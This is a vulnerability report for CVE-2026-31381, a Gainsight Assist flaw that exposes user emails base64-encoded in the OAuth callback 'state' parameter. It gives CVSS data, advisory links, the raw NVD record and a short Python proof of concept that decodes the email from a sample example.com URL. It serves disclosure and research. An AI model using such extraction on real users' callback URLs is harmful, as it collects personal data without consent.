Security Vulnerability Report
CVE-2026-31381 CVSS 5.3 MEDIUM

CVE-2026-31381

Published: 2026-03-20 14:16:15
Last Modified: 2026-04-16 15:16:54

Description

An attacker can extract user email addresses (PII) exposed in base64 encoding via the state parameter in the OAuth callback URL.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gainsight:assist:-:*:*:*:*:*:*:* - VULNERABLE
Gainsight Assist (specific versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import urllib.parse

# Simulated vulnerable OAuth callback URL.
# The 'state' parameter carries the user's email (PII) as plain base64.
target_url = "https://example.com/oauth/callback?state=eyJlbWFpbCI6InVzZXJAZXhhbXBsZS5jb20ifQ%3D%3D"

# Parse the URL and pull out the state parameter.
# parse_qs already percent-decodes values (%3D -> =).
parsed_url = urllib.parse.urlparse(target_url)
params = urllib.parse.parse_qs(parsed_url.query)
encoded_state = params.get('state', [None])[0]

if encoded_state:
    try:
        # Defensive second percent-decode; a no-op after parse_qs.
        url_decoded_state = urllib.parse.unquote(encoded_state)
        # Base64-decode to reveal the embedded PII.
        decoded_bytes = base64.b64decode(url_decoded_state)
        decoded_string = decoded_bytes.decode('utf-8')
        print(f"[+] Leaked PII found: {decoded_string}")
    except Exception as e:
        print(f"[-] Error decoding state: {e}")
else:
    print("[-] No state parameter found in URL.")
```

References

http://www.rapid7.com/blog/post/ve-cve-2026-31381-cve-2026-31382-gainsight-assist-information-disclosure-xss-fixed (Third Party Advisory)
https://communities.gainsight.com/community-news-2/recent-gainsight-assist-plugin-remediations-cve-2026-31381-and-cve-2026-31382-30587 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-31381",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T14:16:14.567",
    "lastModified": "2026-04-16T15:16:53.553",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An attacker can extract user email addresses (PII) exposed in base64 encoding via the state parameter in the OAuth callback URL."},
      {"lang": "es", "value": "Un atacante puede extraer direcciones de correo electrónico de usuario (IIP) expuestas en codificación base64 a través del parámetro state en la URL de devolución de llamada de OAuth."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:gainsight:assist:-:*:*:*:*:*:*:*", "matchCriteriaId": "CEF026DD-1AD7-44D0-8960-A5DDAE4F1BDE"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "http://www.rapid7.com/blog/post/ve-cve-2026-31381-cve-2026-31382-gainsight-assist-information-disclosure-xss-fixed", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://communities.gainsight.com/community-news-2/recent-gainsight-assist-plugin-remediations-cve-2026-31381-and-cve-2026-31382-30587", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}
```